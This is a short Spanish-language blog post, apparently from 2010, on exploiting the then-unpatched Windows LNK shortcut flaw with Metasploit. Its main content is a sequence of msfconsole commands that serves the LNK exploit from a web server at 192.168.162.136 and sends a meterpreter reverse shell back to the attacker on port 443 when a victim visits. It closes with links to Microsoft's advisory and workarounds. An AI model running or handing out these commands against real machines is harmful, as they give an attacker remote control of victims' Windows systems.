Explotando "LNK" con Metasploit - Método 1

[*] - Explotando "LNK" con Metasploit - Método 1
[*] - Explotando "LNK" con Metasploit - Método 2

Metasploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.

Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:

use windows/browser/ms10_xxx_windows_shell_lnk_execute set SRVHOST 192.168.162.136 set SRVPORT 80 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.162.136 set LPORT 443 exploit

De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!

Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
[*] Microsoft Security Advisory (2286198)
[*] Security By Default: Solución a la vulnerabilidad "LNK" de Windows mediante Directivas de Restricción de Software

Información extraída de:
http://www.kungfoosion.com/2010/07/explotando-lnk-con-metasploit.html

Comentarios

Entradas populares de este blog

Trinity Rescue Kit: Tutorial para eliminar la contraseña de administrador en Windows

Cambiar el idioma de Windows XP de inglés al español sin formatear

Crear un Fake AP en muy pocos pasos con Gerix